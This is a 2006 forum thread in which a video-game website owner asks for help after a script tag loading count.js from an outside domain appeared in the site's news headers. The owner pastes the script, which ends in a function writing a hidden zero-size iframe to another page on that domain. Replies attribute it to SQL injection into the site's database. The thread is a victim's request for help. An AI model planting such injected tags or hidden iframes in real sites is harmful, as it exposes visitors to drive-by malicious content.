View Full Version : JavaScript Causing Problem On Website

NLG Chris
10-25-2006, 06:34 PM
I am posting this here hoping that someone can help me with a problem that I am having on my website and get rid of it.

I recently took over a video game related website. All of our updating is done through ASP scripts. Well yesterday, a javascript somehow got on to our site and is wiping out of all of the Headers of our news posts. I am not sure how it got in there or where it is, but I need help in removing it.

Here is the script that was added to our site: <script src="http://newasp.com.cn/count.js"></script>

Here are the contents of the script:

function GetCookie (name) {
var arg = name + "=";
var alen = arg.length;
var clen = document.cookie.length;
var i = 0;
while (i < clen) {
var j = i + alen;
if (document.cookie.substring(i, j) == arg)
return getCookieVal (j);
i = document.cookie.indexOf(" ", i) + 1;
if (i == 0) break;
return null;

function SetCookie (name, value) {
var argv = SetCookie.arguments;
var argc = SetCookie.arguments.length;
var expires = (argc > 2) ? argv[2] : null;
var path = (argc > 3) ? argv[3] : null;
var domain = (argc > 4) ? argv[4] : null;
var secure = (argc > 5) ? argv[5] : false;
document.cookie = name + "=" + escape (value) +
((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
((path == null) ? "" : ("; path=" + path)) +
((domain == null) ? "" : ("; domain=" + domain)) +
((secure == true) ? "; secure" : "");

function DeleteCookie (name) {
var exp = new Date();
exp.setTime (exp.getTime() - 1);
// This cookie is history
var cval = 0;
document.cookie = name + "=" + cval + "; expires=" + exp.toGMTString();
var expDays = 1;
var exp = new Date();
exp.setTime(exp.getTime() + (expDays*24*60*60*1000));

function amt(){
var count = GetCookie('count');
//var count;
//count = null;
if(count == null) {
return 1
var newcount = parseInt(count) + 1;
if(newcount<2) count=1;
return newcount

function getCookieVal(offset) {
var endstr = document.cookie.indexOf (";", offset);
if (endstr == -1)
endstr = document.cookie.length;
return unescape(document.cookie.substring(offset, endstr));
function sethome(){
document.write('<iframe src="http://newasp.com.cn/baidu/baidu.htm" width="0" height="0" scrolling="no" frameborder="0"></iframe>');


Can anyone help me determine exactly what this is and how to get rid of it?

All of this is Greek to me, and my web guy is unavailable right now.

If this is not the right place for this, can you point me in the right direction?

Thanks in advance for all of your help.

10-26-2006, 10:29 AM
why not simply remove
<script src="http://newasp.com.cn/count.js"></script>

NLG Chris
10-26-2006, 01:31 PM
why not simply remove
<script src="http://newasp.com.cn/count.js"></script>

Because I can not find that script anywhere in our code.

Philip M
10-26-2006, 01:58 PM
Because I can not find that script anywhere in our code.

He did not say remove the script. He said remove the line in your code which is calling your script.

"Here is the script that was added to our site: <script src="http://newasp.com.cn/count.js"></script>"

01-02-2007, 12:07 PM
Hi Chris,
You probably know by now, but the line of code you are describing is probably coming from the database (not an actual line of code). This is a bit of a common hack, you will probably find someone has injected an SQL statement into your database via one of your pages. Changing a database field to contain this "script" tag.
Best check the whole of your content management database to see if it appears anywhere else, but if you google the http that the iframe calls, you will notice that there is a fair few site that have been hacked with this code!

Good luck.